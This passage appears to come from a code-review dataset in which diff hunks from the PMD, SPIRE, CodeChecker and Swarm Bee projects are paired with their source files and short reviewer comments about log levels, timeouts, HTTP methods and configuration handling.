import com.beust.jcommander.ParameterException;
/**
* Result of parsing a bunch of CLI arguments. Parsing may fail with an
* exception, or succeed and produce a {@link PMDConfiguration}. If the
* {@code --help} argument is mentioned, no configuration is produced.
*/
public final class PmdParametersParseResult {
private final PMDParameters result;
private final ParameterException error;
PmdParametersParseResult(PMDParameters result) {
this.result = Objects.requireNonNull(result);
this.error = null;
}
PmdParametersParseResult(ParameterException error) {
this.result = null;
this.error = Objects.requireNonNull(error);
}
/** Returns true if parsing failed. */
public boolean isError() {
return result == null;
}
/**
* Returns whether parsing just requested the {@code --help} text.
* In this case no configuration is produced.
*/
public boolean isHelp() {
return !isError() && result.isHelp();
}
/**
* Returns the error if parsing failed. Parsing may fail if required
* parameters are not provided, or if some parameters don't pass validation.
* Otherwise returns null.
*/
public ParameterException getError() {
return error;
}
/**
     * Returns the resulting configuration if parsing succeeded and {@link #isHelp()} is false.
* Otherwise returns null.
*/
public PMDConfiguration toConfiguration() {
return result != null && !isHelp() ? result.toConfiguration() : null;
}
/**
     * Parses an array of CLI parameters and returns a result (which may be a failure).
* Use this instead of {@link PMDCommandLineInterface#extractParameters(PMDParameters, String[], String)},
* because that one may terminate the VM.
*
* @param args Array of parameters
*
* @return A parse result
*
* @throws NullPointerException If the parameter array is null
*/
public static PmdParametersParseResult extractParameters(String... args) {
Objects.requireNonNull(args, "Null parameter array");
PMDParameters result = new PMDParameters();
JCommander jcommander = new JCommander(result);
jcommander.setProgramName("pmd");
try {
jcommander.parse(args);
return new PmdParametersParseResult(result);
} catch (ParameterException e) {
return new PmdParametersParseResult(e);
}
}
}
 | 1 | 19,201 | This is not actually the case; you need to modify `toConfiguration` below to prevent a configuration from being produced. | pmd-pmd | java 
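A minimal sketch of the change the reviewer is asking for (hypothetical, not the actual follow-up commit): `toConfiguration` would also have to consult the new `isVersion()` flag so that no configuration object is built when `--version` is requested.

```java
    /**
     * Returns the resulting configuration if parsing succeeded and neither
     * {@link #isHelp()} nor {@link #isVersion()} was requested.
     * Otherwise returns null.
     */
    public PMDConfiguration toConfiguration() {
        return result != null && !isHelp() && !isVersion() ? result.toConfiguration() : null;
    }
```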
@@ -88,7 +88,7 @@ func (a *attestor) loadSVID(ctx context.Context) (*x509.Certificate, *ecdsa.Priv
svid := a.readSVIDFromDisk()
if len(fResp.PrivateKey) > 0 && svid == nil {
- a.c.Log.Warn("Private key recovered, but no SVID found")
+ a.c.Log.Debug("Private key recovered, but no SVID found")
}
var keyData []byte | 1 | package attestor
import (
"context"
"crypto/ecdsa"
"crypto/tls"
"crypto/x509"
"errors"
"fmt"
"io"
"net/url"
"path"
"github.com/sirupsen/logrus"
spiffe_tls "github.com/spiffe/go-spiffe/tls"
"github.com/spiffe/spire/pkg/agent/catalog"
"github.com/spiffe/spire/pkg/agent/manager"
"github.com/spiffe/spire/pkg/common/grpcutil"
"github.com/spiffe/spire/pkg/common/util"
"github.com/spiffe/spire/proto/agent/keymanager"
"github.com/spiffe/spire/proto/agent/nodeattestor"
"github.com/spiffe/spire/proto/api/node"
"github.com/spiffe/spire/proto/common"
"google.golang.org/grpc"
"google.golang.org/grpc/credentials"
)
type AttestationResult struct {
SVID *x509.Certificate
Key *ecdsa.PrivateKey
Bundle []*x509.Certificate
}
type Attestor interface {
Attest(ctx context.Context) (*AttestationResult, error)
}
type Config struct {
Catalog catalog.Catalog
JoinToken string
TrustDomain url.URL
TrustBundle []*x509.Certificate
BundleCachePath string
SVIDCachePath string
Log logrus.FieldLogger
ServerAddress string
NodeClient node.NodeClient
}
type attestor struct {
c *Config
}
func New(config *Config) Attestor {
return &attestor{c: config}
}
func (a *attestor) Attest(ctx context.Context) (*AttestationResult, error) {
bundle, err := a.loadBundle()
if err != nil {
return nil, err
}
svid, key, err := a.loadSVID(ctx)
if err != nil {
return nil, err
}
if svid == nil {
svid, bundle, err = a.newSVID(ctx, key, bundle)
if err != nil {
return nil, err
}
}
return &AttestationResult{Bundle: bundle, SVID: svid, Key: key}, nil
}
func (a *attestor) loadSVID(ctx context.Context) (*x509.Certificate, *ecdsa.PrivateKey, error) {
mgrs := a.c.Catalog.KeyManagers()
if len(mgrs) > 1 {
return nil, nil, errors.New("more than one key manager configured")
}
mgr := mgrs[0]
fResp, err := mgr.FetchPrivateKey(ctx, &keymanager.FetchPrivateKeyRequest{})
if err != nil {
return nil, nil, fmt.Errorf("load private key: %v", err)
}
svid := a.readSVIDFromDisk()
if len(fResp.PrivateKey) > 0 && svid == nil {
a.c.Log.Warn("Private key recovered, but no SVID found")
}
var keyData []byte
if len(fResp.PrivateKey) > 0 && svid != nil {
keyData = fResp.PrivateKey
} else {
gResp, err := mgr.GenerateKeyPair(ctx, &keymanager.GenerateKeyPairRequest{})
if err != nil {
return nil, nil, fmt.Errorf("generate key pair: %s", err)
}
svid = nil
keyData = gResp.PrivateKey
}
key, err := x509.ParseECPrivateKey(keyData)
if err != nil {
		return nil, nil, fmt.Errorf("parse key from keymanager: %v", err)
}
return svid, key, nil
}
func (a *attestor) loadBundle() ([]*x509.Certificate, error) {
bundle, err := manager.ReadBundle(a.c.BundleCachePath)
if err == manager.ErrNotCached {
bundle = a.c.TrustBundle
} else if err != nil {
return nil, err
}
if bundle == nil {
return nil, errors.New("load bundle: no bundle provided")
}
if len(bundle) < 1 {
return nil, errors.New("load bundle: no certs in bundle")
}
return bundle, nil
}
func (a *attestor) fetchAttestationData(
fetchStream nodeattestor.FetchAttestationData_Stream,
challenge []byte) (*nodeattestor.FetchAttestationDataResponse, error) {
// the stream should only be nil if this node attestation is via a join
// token.
if fetchStream == nil {
data := &common.AttestationData{
Type: "join_token",
Data: []byte(a.c.JoinToken),
}
id := &url.URL{
Scheme: "spiffe",
Host: a.c.TrustDomain.Host,
Path: path.Join("spire", "agent", "join_token", a.c.JoinToken),
}
return &nodeattestor.FetchAttestationDataResponse{
AttestationData: data,
SpiffeId: id.String(),
}, nil
}
if challenge != nil {
fetchReq := &nodeattestor.FetchAttestationDataRequest{
Challenge: challenge,
}
if err := fetchStream.Send(fetchReq); err != nil {
return nil, fmt.Errorf("requesting attestation data: %v", err)
}
}
fetchResp, err := fetchStream.Recv()
if err != nil {
return nil, fmt.Errorf("receiving attestation data: %v", err)
}
return fetchResp, nil
}
// Read agent SVID from data dir. If an error is encountered, it will be logged and `nil`
// will be returned.
func (a *attestor) readSVIDFromDisk() *x509.Certificate {
cert, err := manager.ReadSVID(a.c.SVIDCachePath)
if err == manager.ErrNotCached {
a.c.Log.Debug("No pre-existing agent SVID found. Will perform node attestation")
return nil
} else if err != nil {
a.c.Log.Warnf("Could not get agent SVID from %s: %s", a.c.SVIDCachePath, err)
}
return cert
}
// newSVID obtains an agent SVID for the given private key by performing node attestation. The bundle is
// necessary in order to validate the SPIRE server we are attesting to. Returns the SVID and an updated bundle.
func (a *attestor) newSVID(ctx context.Context, key *ecdsa.PrivateKey, bundle []*x509.Certificate) (*x509.Certificate, []*x509.Certificate, error) {
// make sure all of the streams are cancelled if something goes awry
ctx, cancel := context.WithCancel(ctx)
defer cancel()
var fetchStream nodeattestor.FetchAttestationData_Stream
if a.c.JoinToken == "" {
plugins := a.c.Catalog.NodeAttestors()
if len(plugins) > 1 {
return nil, nil, errors.New("more than one node attestor configured")
}
attestor := plugins[0]
var err error
fetchStream, err = attestor.FetchAttestationData(ctx)
if err != nil {
return nil, nil, fmt.Errorf("opening stream for fetching attestation: %v", err)
}
}
conn, err := a.serverConn(ctx, bundle)
if err != nil {
return nil, nil, fmt.Errorf("create attestation client: %v", err)
}
defer conn.Close()
if a.c.NodeClient == nil {
a.c.NodeClient = node.NewNodeClient(conn)
}
attestStream, err := a.c.NodeClient.Attest(ctx)
if err != nil {
return nil, nil, fmt.Errorf("opening stream for attestation: %v", err)
}
var spiffeID string
var csr []byte
attestResp := new(node.AttestResponse)
for {
data, err := a.fetchAttestationData(fetchStream, attestResp.Challenge)
if err != nil {
return nil, nil, err
}
// (re)generate the SVID if the spiffeid changes.
if spiffeID != data.SpiffeId {
csr, err = util.MakeCSR(key, data.SpiffeId)
if err != nil {
return nil, nil, fmt.Errorf("generate CSR for agent SVID: %v", err)
}
spiffeID = data.SpiffeId
}
attestReq := &node.AttestRequest{
AttestationData: data.AttestationData,
Csr: csr,
Response: data.Response,
}
if err := attestStream.Send(attestReq); err != nil {
return nil, nil, fmt.Errorf("sending attestation request to SPIRE server: %v", err)
}
attestResp, err = attestStream.Recv()
if err != nil {
return nil, nil, fmt.Errorf("attesting to SPIRE server: %v", err)
}
// if the response has no additional data then break out and parse
// the response.
if attestResp.Challenge == nil {
break
}
}
if fetchStream != nil {
fetchStream.CloseSend()
if _, err := fetchStream.Recv(); err != io.EOF {
a.c.Log.Warnf("received unexpected result on trailing recv: %v", err)
}
}
attestStream.CloseSend()
if _, err := attestStream.Recv(); err != io.EOF {
a.c.Log.Warnf("received unexpected result on trailing recv: %v", err)
}
svid, bundle, err := a.parseAttestationResponse(spiffeID, attestResp)
if err != nil {
return nil, nil, fmt.Errorf("parse attestation response: %v", err)
}
return svid, bundle, nil
}
func (a *attestor) serverConn(ctx context.Context, bundle []*x509.Certificate) (*grpc.ClientConn, error) {
config := grpcutil.GRPCDialerConfig{
Log: grpcutil.LoggerFromFieldLogger(a.c.Log),
CredFunc: a.serverCredFunc(bundle),
}
dialer := grpcutil.NewGRPCDialer(config)
return dialer.Dial(ctx, a.c.ServerAddress)
}
func (a *attestor) serverCredFunc(bundle []*x509.Certificate) func() (credentials.TransportCredentials, error) {
pool := x509.NewCertPool()
for _, c := range bundle {
pool.AddCert(c)
}
spiffePeer := &spiffe_tls.TLSPeer{
SpiffeIDs: []string{a.serverID().String()},
TrustRoots: pool,
}
// Explicitly not mTLS since we don't have an SVID yet
tlsConfig := spiffePeer.NewTLSConfig([]tls.Certificate{})
credFunc := func() (credentials.TransportCredentials, error) { return credentials.NewTLS(tlsConfig), nil }
return credFunc
}
func (a *attestor) parseAttestationResponse(id string, r *node.AttestResponse) (*x509.Certificate, []*x509.Certificate, error) {
if r.SvidUpdate == nil {
return nil, nil, errors.New("response missing svid update")
}
if len(r.SvidUpdate.Svids) < 1 {
return nil, nil, errors.New("no svid received")
}
svidMsg, ok := r.SvidUpdate.Svids[id]
if !ok {
return nil, nil, fmt.Errorf("incorrect svid: %s", id)
}
svid, err := x509.ParseCertificate(svidMsg.Cert)
if err != nil {
return nil, nil, fmt.Errorf("invalid svid: %v", err)
}
if r.SvidUpdate.Bundles == nil {
return nil, nil, errors.New("missing bundles")
}
bundle := r.SvidUpdate.Bundles[a.c.TrustDomain.String()]
if bundle == nil {
return nil, nil, errors.New("missing bundle")
}
bundleCerts, err := x509.ParseCertificates(bundle.CaCerts)
if err != nil {
return nil, nil, fmt.Errorf("invalid bundle: %v", bundle)
}
return svid, bundleCerts, nil
}
func (a *attestor) serverID() *url.URL {
return &url.URL{
Scheme: "spiffe",
Host: a.c.TrustDomain.Host,
Path: path.Join("spire", "server"),
}
}
 | 1 | 9,958 | I'm worried that we might hide some important logs here | spiffe-spire | go 
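One way to address the reviewer's concern, sketched here as an assumption rather than the actual fix, is to keep the message at a level operators still see by default (for example Info instead of Debug):

```go
	svid := a.readSVIDFromDisk()
	if len(fResp.PrivateKey) > 0 && svid == nil {
		// Recovering a key without an SVID means the agent will re-attest;
		// keeping this above Debug leaves a visible trace for operators.
		a.c.Log.Info("Private key recovered, but no SVID found")
	}
```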
@@ -625,7 +625,7 @@ def start_workers(actions_map, actions, context, analyzer_config_map,
callback=lambda results: worker_result_handler(
results, metadata, output_path,
context.analyzer_binaries)
- ).get(float('inf'))
+ ).get(31557600)
pool.close()
except Exception: | 1 | # -------------------------------------------------------------------------
# The CodeChecker Infrastructure
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
# -------------------------------------------------------------------------
"""
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import glob
import multiprocessing
import os
import shlex
import shutil
import signal
import sys
import traceback
import zipfile
from tu_collector import tu_collector
from codechecker_common import util, plist_parser
from codechecker_common.env import get_check_env
from codechecker_common.logger import get_logger
from . import gcc_toolchain
from .analyzers import analyzer_types
from .analyzers.clangsa.analyzer import ClangSA
from .analyzers.clangsa.statistics_collector import SpecialReturnValueCollector
LOG = get_logger('analyzer')
def print_analyzer_statistic_summary(statistics, status, msg=None):
"""
Print analyzer statistic summary for the given status code with the given
section heading message.
"""
has_status = sum((res.get(status, 0) for res in
(statistics[i] for i in statistics)))
if has_status and msg:
LOG.info(msg)
for analyzer_type, res in statistics.items():
successful = res[status]
if successful:
LOG.info(" %s: %s", analyzer_type, successful)
def worker_result_handler(results, metadata, output_path, analyzer_binaries):
"""
Print the analysis summary.
"""
if metadata is None:
metadata = {}
skipped_num = 0
reanalyzed_num = 0
statistics = {}
for res, skipped, reanalyzed, analyzer_type, _, sources in results:
if skipped:
skipped_num += 1
else:
if reanalyzed:
reanalyzed_num += 1
if analyzer_type not in statistics:
analyzer_bin = analyzer_binaries[analyzer_type]
analyzer_version = \
metadata.get('versions', {}).get(analyzer_bin)
statistics[analyzer_type] = {
"failed": 0,
"failed_sources": [],
"successful": 0,
"version": analyzer_version
}
if res == 0:
statistics[analyzer_type]['successful'] += 1
else:
statistics[analyzer_type]['failed'] += 1
statistics[analyzer_type]['failed_sources'].append(sources)
LOG.info("----==== Summary ====----")
print_analyzer_statistic_summary(statistics,
'successful',
'Successfully analyzed')
print_analyzer_statistic_summary(statistics,
'failed',
'Failed to analyze')
if reanalyzed_num:
LOG.info("Reanalyzed compilation commands: %d", reanalyzed_num)
if skipped_num:
LOG.info("Skipped compilation commands: %d", skipped_num)
metadata['skipped'] = skipped_num
metadata['analyzer_statistics'] = statistics
# check() created the result .plist files and additional, per-analysis
# meta information in forms of .plist.source files.
# We now soak these files into the metadata dict, as they are not needed
# as loose files on the disk... but synchronizing LARGE dicts between
# threads would be more error prone.
source_map = {}
for f in glob.glob(os.path.join(output_path, "*.source")):
with open(f, 'r') as sfile:
source_map[f[:-7]] = sfile.read().strip()
os.remove(f)
for f in glob.glob(os.path.join(output_path, 'failed', "*.error")):
err_file, _ = os.path.splitext(f)
plist_file = os.path.basename(err_file) + ".plist"
plist_file = os.path.join(output_path, plist_file)
metadata['result_source_files'].pop(plist_file, None)
metadata['result_source_files'].update(source_map)
# Progress reporting.
progress_checked_num = None
progress_actions = None
def init_worker(checked_num, action_num):
global progress_checked_num, progress_actions
progress_checked_num = checked_num
progress_actions = action_num
def save_output(base_file_name, out, err):
try:
if out:
with open(base_file_name + ".stdout.txt", 'w') as outf:
outf.write(out)
if err:
with open(base_file_name + ".stderr.txt", 'w') as outf:
outf.write(err)
except IOError as ioerr:
LOG.debug("Failed to save analyzer output")
LOG.debug(ioerr)
def save_metadata(result_file, analyzer_result_file, analyzed_source_file):
"""
Save some extra information next to the plist, .source
acting as an extra metadata file.
"""
with open(result_file + ".source", 'w') as orig:
orig.write(analyzed_source_file.replace(r'\ ', ' ') + "\n")
if os.path.exists(analyzer_result_file) and \
not os.path.exists(result_file):
os.rename(analyzer_result_file, result_file)
def is_ctu_active(source_analyzer):
"""
Check if CTU analysis is active for Clang Static Analyzer.
"""
if not isinstance(source_analyzer, ClangSA):
return False
return source_analyzer.is_ctu_available() and \
source_analyzer.is_ctu_enabled()
def prepare_check(action, analyzer_config_map, output_dir,
severity_map, skip_handler, statistics_data,
disable_ctu=False):
"""
    Construct the source analyzer, build the analysis command,
    and create the result handler for the analysis.
"""
reanalyzed = False
# Create a source analyzer.
source_analyzer = \
analyzer_types.construct_analyzer(action,
analyzer_config_map)
if disable_ctu:
# WARNING! can be called only on ClangSA
# Needs to be called before construct_analyzer_cmd
source_analyzer.disable_ctu()
if action.analyzer_type == ClangSA.ANALYZER_NAME and \
statistics_data:
# WARNING! Statistical checkers are only supported by Clang
# Static Analyzer right now.
stats_dir = statistics_data['stats_out_dir']
# WARNING Because both statistical checkers use the same config
# directory it is enough to add it only once. This might change later.
# Configuration arguments should be added before the checkers are
# enabled.
stats_cfg = \
SpecialReturnValueCollector.checker_analyze_cfg(stats_dir)
source_analyzer.add_checker_config(stats_cfg)
# Source is the currently analyzed source file
# there can be more in one buildaction.
source_analyzer.source_file = action.source
# The result handler for analysis is an empty result handler
# which only returns metadata, but can't process the results.
rh = source_analyzer.construct_result_handler(action,
output_dir,
severity_map,
skip_handler)
# NOTICE!
# The currently analyzed source file needs to be set before the
# analyzer command is constructed.
# The analyzer output file is based on the currently
# analyzed source.
rh.analyzed_source_file = action.source
if os.path.exists(rh.analyzer_result_file):
reanalyzed = True
# Construct the analyzer cmd.
analyzer_cmd = source_analyzer.construct_analyzer_cmd(rh)
return source_analyzer, analyzer_cmd, rh, reanalyzed
def handle_success(rh, result_file, result_base, skip_handler,
capture_analysis_output, success_dir):
"""
Result postprocessing is required if the analysis was
successful (mainly clang tidy output conversion is done).
Skipping reports for header files is done here too.
"""
if capture_analysis_output:
save_output(os.path.join(success_dir, result_base),
rh.analyzer_stdout, rh.analyzer_stderr)
rh.postprocess_result()
# Generated reports will be handled separately at store.
save_metadata(result_file, rh.analyzer_result_file,
rh.analyzed_source_file)
if skip_handler:
# We need to check the plist content because skipping
# reports in headers can be done only this way.
plist_parser.skip_report_from_plist(result_file,
skip_handler)
def handle_failure(source_analyzer, rh, zip_file, result_base, actions_map):
"""
If the analysis fails a debug zip is packed together which contains
build, analysis information and source files to be able to
reproduce the failed analysis.
"""
other_files = set()
action = rh.buildaction
try:
LOG.debug("Fetching other dependent files from analyzer "
"output...")
other_files.update(
source_analyzer.get_analyzer_mentioned_files(
rh.analyzer_stdout))
other_files.update(
source_analyzer.get_analyzer_mentioned_files(
rh.analyzer_stderr))
except Exception as ex:
LOG.debug("Couldn't generate list of other files "
"from analyzer output:")
LOG.debug(str(ex))
LOG.debug("Collecting debug data")
buildactions = [{
'file': action.source,
'command': action.original_command,
'directory': action.directory}]
for of in other_files:
mentioned_file = os.path.abspath(os.path.join(action.directory, of))
key = mentioned_file, action.target
mentioned_file_action = actions_map.get(key)
if mentioned_file_action is not None:
buildactions.append({
'file': mentioned_file_action.source,
'command': mentioned_file_action.original_command,
'directory': mentioned_file_action.directory})
else:
LOG.debug("Could not find %s in build actions.", key)
tu_collector.zip_tu_files(zip_file, buildactions)
# TODO: What about the dependencies of the other_files?
tu_collector.add_sources_to_zip(
zip_file,
map(lambda path: os.path.join(action.directory, path), other_files))
with zipfile.ZipFile(zip_file, 'a') as archive:
LOG.debug("[ZIP] Writing analyzer STDOUT to /stdout")
archive.writestr("stdout", rh.analyzer_stdout)
LOG.debug("[ZIP] Writing analyzer STDERR to /stderr")
archive.writestr("stderr", rh.analyzer_stderr)
LOG.debug("[ZIP] Writing extra information...")
archive.writestr("build-action", action.original_command)
archive.writestr("analyzer-command", ' '.join(rh.analyzer_cmd))
archive.writestr("return-code", str(rh.analyzer_returncode))
toolchain = gcc_toolchain.toolchain_in_args(
shlex.split(action.original_command))
if toolchain:
archive.writestr("gcc-toolchain-path", toolchain)
LOG.debug("ZIP file written at '%s'", zip_file)
# Remove files that successfully analyzed earlier on.
plist_file = result_base + ".plist"
if os.path.exists(plist_file):
os.remove(plist_file)
def check(check_data):
"""
    Invoke clang with a build action; this function is called by the worker
    processes. A different analyzer object belongs to each build action.
    The skiplist handler is None if no skip file was configured.
"""
actions_map, action, context, analyzer_config_map, \
output_dir, skip_handler, quiet_output_on_stdout, \
capture_analysis_output, analysis_timeout, \
analyzer_environment, ctu_reanalyze_on_failure, \
output_dirs, statistics_data = check_data
failed_dir = output_dirs["failed"]
success_dir = output_dirs["success"]
try:
# If one analysis fails the check fails.
return_codes = 0
reanalyzed = False
result_file = ''
source_analyzer, analyzer_cmd, rh, reanalyzed = \
prepare_check(action, analyzer_config_map,
output_dir, context.severity_map,
skip_handler, statistics_data)
# The analyzer invocation calls __create_timeout as a callback
# when the analyzer starts. This callback creates the timeout
# watcher over the analyzer process, which in turn returns a
# function, that can later be used to check if the analyzer quit
# because we killed it due to a timeout.
#
# We need to capture the "function pointer" returned by
# setup_process_timeout as reference, so that we may call it
# later. To work around scoping issues, we use a list here so the
# "function pointer" is captured by reference.
timeout_cleanup = [lambda: False]
if analysis_timeout and analysis_timeout > 0:
def __create_timeout(analyzer_process):
"""
Once the analyzer process is started, this method is
called. Set up a timeout for the analysis.
"""
timeout_cleanup[0] = util.setup_process_timeout(
analyzer_process, analysis_timeout)
else:
def __create_timeout(analyzer_process):
# If no timeout is given by the client, this callback
# shouldn't do anything.
pass
# Fills up the result handler with the analyzer information.
source_analyzer.analyze(analyzer_cmd, rh, analyzer_environment,
__create_timeout)
# If execution reaches this line, the analyzer process has quit.
if timeout_cleanup[0]():
LOG.warning("Analyzer ran too long, exceeding time limit "
"of %d seconds.", analysis_timeout)
LOG.warning("Considering this analysis as failed...")
rh.analyzer_returncode = -1
rh.analyzer_stderr = (">>> CodeChecker: Analysis timed out "
"after {0} seconds. <<<\n{1}") \
.format(analysis_timeout, rh.analyzer_stderr)
# If source file contains escaped spaces ("\ " tokens), then
        # clangSA writes the plist file after removing this escape
# sequence, whereas clang-tidy does not. We rewrite the file
# names to contain no escape sequences for every analyzer.
result_file = rh.analyzer_result_file.replace(r'\ ', ' ')
result_base = os.path.basename(result_file)
ctu_active = is_ctu_active(source_analyzer)
ctu_suffix = '_CTU'
zip_suffix = ctu_suffix if ctu_active else ''
failure_type = "_unknown"
if rh.analyzer_returncode == 1:
failure_type = "_compile_error"
elif rh.analyzer_returncode == 254:
failure_type = "_crash"
zip_file = result_base + zip_suffix + failure_type + '.zip'
zip_file = os.path.join(failed_dir, zip_file)
ctu_zip_file = result_base + ctu_suffix + failure_type + '.zip'
ctu_zip_file = os.path.join(failed_dir, ctu_zip_file)
return_codes = rh.analyzer_returncode
source_file_name = os.path.basename(action.source)
if rh.analyzer_returncode == 0:
# Remove the previously generated error file.
if os.path.exists(zip_file):
os.remove(zip_file)
# Remove the previously generated CTU error file.
if os.path.exists(ctu_zip_file):
os.remove(ctu_zip_file)
handle_success(rh, result_file, result_base,
skip_handler, capture_analysis_output,
success_dir)
LOG.info("[%d/%d] %s analyzed %s successfully.",
progress_checked_num.value, progress_actions.value,
action.analyzer_type, source_file_name)
if skip_handler:
# We need to check the plist content because skipping
# reports in headers can be done only this way.
plist_parser.skip_report_from_plist(result_file,
skip_handler)
else:
LOG.error("Analyzing %s with %s %s failed!",
source_file_name,
action.analyzer_type,
"CTU" if ctu_active else "")
if not quiet_output_on_stdout:
LOG.error("\n%s", rh.analyzer_stdout)
LOG.error("\n%s", rh.analyzer_stderr)
handle_failure(source_analyzer, rh, zip_file, result_base,
actions_map)
if ctu_active and ctu_reanalyze_on_failure:
LOG.error("Try to reanalyze without CTU")
# Try to reanalyze with CTU disabled.
source_analyzer, analyzer_cmd, rh, reanalyzed = \
prepare_check(action,
analyzer_config_map,
output_dir,
context.severity_map,
skip_handler,
statistics_data,
True)
# Fills up the result handler with
# the analyzer information.
source_analyzer.analyze(analyzer_cmd,
rh,
analyzer_environment)
return_codes = rh.analyzer_returncode
if rh.analyzer_returncode == 0:
handle_success(rh, result_file, result_base,
skip_handler, capture_analysis_output,
success_dir)
LOG.info("[%d/%d] %s analyzed %s without"
" CTU successfully.",
progress_checked_num.value,
progress_actions.value,
action.analyzer_type,
source_file_name)
else:
LOG.error("Analyzing '%s' with %s without CTU failed.",
source_file_name, action.analyzer_type)
zip_file = result_base + '.zip'
zip_file = os.path.join(failed_dir, zip_file)
handle_failure(source_analyzer, rh, zip_file,
result_base, actions_map)
if not quiet_output_on_stdout:
if rh.analyzer_returncode:
LOG.error('\n%s', rh.analyzer_stdout)
LOG.error('\n%s', rh.analyzer_stderr)
else:
LOG.debug_analyzer('\n%s', rh.analyzer_stdout)
LOG.debug_analyzer('\n%s', rh.analyzer_stderr)
progress_checked_num.value += 1
return return_codes, False, reanalyzed, action.analyzer_type, \
result_file, action.source
except Exception as e:
LOG.debug_analyzer(str(e))
traceback.print_exc(file=sys.stdout)
return 1, False, reanalyzed, action.analyzer_type, None, \
action.source
def skip_cpp(compile_actions, skip_handler):
"""If there is no skiplist handler there was no skip list file in
the command line.
C++ file skipping is handled here.
"""
if not skip_handler:
return compile_actions, []
analyze = []
skip = []
for compile_action in compile_actions:
if skip_handler and skip_handler.should_skip(compile_action.source):
skip.append(compile_action)
else:
analyze.append(compile_action)
return analyze, skip
def start_workers(actions_map, actions, context, analyzer_config_map,
jobs, output_path, skip_handler, metadata,
quiet_analyze, capture_analysis_output, timeout,
ctu_reanalyze_on_failure, statistics_data, manager):
"""
Start the workers in the process pool.
    For every build action there is a worker which performs the analysis.
"""
# Handle SIGINT to stop this script running.
def signal_handler(*arg, **kwarg):
try:
pool.terminate()
manager.shutdown()
finally:
sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)
# Start checking parallel.
checked_var = multiprocessing.Value('i', 1)
actions_num = multiprocessing.Value('i', len(actions))
pool = multiprocessing.Pool(jobs,
initializer=init_worker,
initargs=(checked_var,
actions_num))
failed_dir = os.path.join(output_path, "failed")
# If the analysis has failed, we help debugging.
if not os.path.exists(failed_dir):
os.makedirs(failed_dir)
success_dir = os.path.join(output_path, "success")
# Analysis was successful processing results.
if not os.path.exists(success_dir):
os.makedirs(success_dir)
output_dirs = {'success': success_dir,
'failed': failed_dir}
# Construct analyzer env.
analyzer_environment = get_check_env(context.path_env_extra,
context.ld_lib_path_extra)
actions, skipped_actions = skip_cpp(actions, skip_handler)
analyzed_actions = [(actions_map,
build_action,
context,
analyzer_config_map,
output_path,
skip_handler,
quiet_analyze,
capture_analysis_output,
timeout,
analyzer_environment,
ctu_reanalyze_on_failure,
output_dirs,
statistics_data)
for build_action in actions]
if analyzed_actions:
try:
# Workaround, equivalent of map.
            # The main script does not receive the signal
            # while the map or map_async function is running.
            # It is a Python bug; it does not happen if a timeout is
            # specified, in which case the interrupt is received immediately.
pool.map_async(check,
analyzed_actions,
1,
callback=lambda results: worker_result_handler(
results, metadata, output_path,
context.analyzer_binaries)
).get(float('inf'))
pool.close()
except Exception:
pool.terminate()
raise
finally:
pool.join()
else:
LOG.info("----==== Summary ====----")
for skp in skipped_actions:
LOG.debug_analyzer("%s is skipped", skp.source)
LOG.info("Total analyzed compilation commands: %d", len(analyzed_actions))
LOG.info("----=================----")
if not os.listdir(success_dir):
shutil.rmtree(success_dir)
if not os.listdir(failed_dir):
shutil.rmtree(failed_dir)
| 1 | 10,402 | Python 3 will throw an exception for inf, but not providing a timeout will result in no timeout exception. | Ericsson-codechecker | c |
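A self-contained sketch of the pattern the patch adopts (the pool and worker below are illustrative, not CodeChecker's own code): calling `.get()` with a large but finite timeout keeps `KeyboardInterrupt` deliverable while `map_async` is running, and avoids `float('inf')`, which the reviewer notes is rejected as a timeout value on Python 3.

```python
import multiprocessing

ONE_YEAR_IN_SECONDS = 31557600  # finite stand-in for "no timeout"

def square(x):
    return x * x

if __name__ == '__main__':
    pool = multiprocessing.Pool(2)
    # A finite timeout (instead of float('inf') or no timeout at all) lets
    # Ctrl-C interrupt the main process while the workers are still running.
    results = pool.map_async(square, range(10), 1).get(ONE_YEAR_IN_SECONDS)
    pool.close()
    pool.join()
    print(results)
```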
@@ -45,6 +45,18 @@ func (s *server) setupRouting() {
"POST": http.HandlerFunc(s.chunkUploadHandler),
})
+ router.Handle("/bzz-tag/name/{name}", jsonhttp.MethodHandler{
+ "GET": http.HandlerFunc(s.getANewTag),
+ })
+
+ router.Handle("/bzz-tag/addr/{addr}", jsonhttp.MethodHandler{
+ "GET": http.HandlerFunc(s.getTagInfoUsingAddress),
+ })
+
+ router.Handle("/bzz-tag/uuid/{uuid}", jsonhttp.MethodHandler{
+ "GET": http.HandlerFunc(s.getTagInfoUsingUUid),
+ })
+
s.Handler = web.ChainHandlers(
logging.NewHTTPAccessLogHandler(s.Logger, logrus.InfoLevel, "api access"),
handlers.CompressHandler, | 1 | // Copyright 2020 The Swarm Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package api
import (
"fmt"
"net/http"
"github.com/ethersphere/bee/pkg/jsonhttp"
"github.com/ethersphere/bee/pkg/logging"
"github.com/gorilla/handlers"
"github.com/gorilla/mux"
"github.com/sirupsen/logrus"
"resenje.org/web"
)
func (s *server) setupRouting() {
router := mux.NewRouter()
router.NotFoundHandler = http.HandlerFunc(jsonhttp.NotFoundHandler)
router.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
fmt.Fprintln(w, "Ethereum Swarm Bee")
})
router.HandleFunc("/robots.txt", func(w http.ResponseWriter, r *http.Request) {
fmt.Fprintln(w, "User-agent: *\nDisallow: /")
})
router.Handle("/pingpong/{peer-id}", jsonhttp.MethodHandler{
"POST": http.HandlerFunc(s.pingpongHandler),
})
router.Handle("/bzz", jsonhttp.MethodHandler{
"POST": http.HandlerFunc(s.bzzUploadHandler),
})
router.Handle("/bzz/{address}", jsonhttp.MethodHandler{
"GET": http.HandlerFunc(s.bzzGetHandler),
})
router.Handle("/bzz-chunk/{addr}", jsonhttp.MethodHandler{
"GET": http.HandlerFunc(s.chunkGetHandler),
"POST": http.HandlerFunc(s.chunkUploadHandler),
})
s.Handler = web.ChainHandlers(
logging.NewHTTPAccessLogHandler(s.Logger, logrus.InfoLevel, "api access"),
handlers.CompressHandler,
// todo: add recovery handler
s.pageviewMetricsHandler,
web.FinalHandler(router),
)
}
 | 1 | 10,180 | As this method changes the state, it should be `POST`. Also, maybe rename it to `createTag`? | ethersphere-bee | go 
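A sketch of the route as the reviewer suggests it (the handler name `createTag` is the reviewer's proposal, not existing code): inside `setupRouting`, tag creation would be registered under `POST` because it mutates state.

```go
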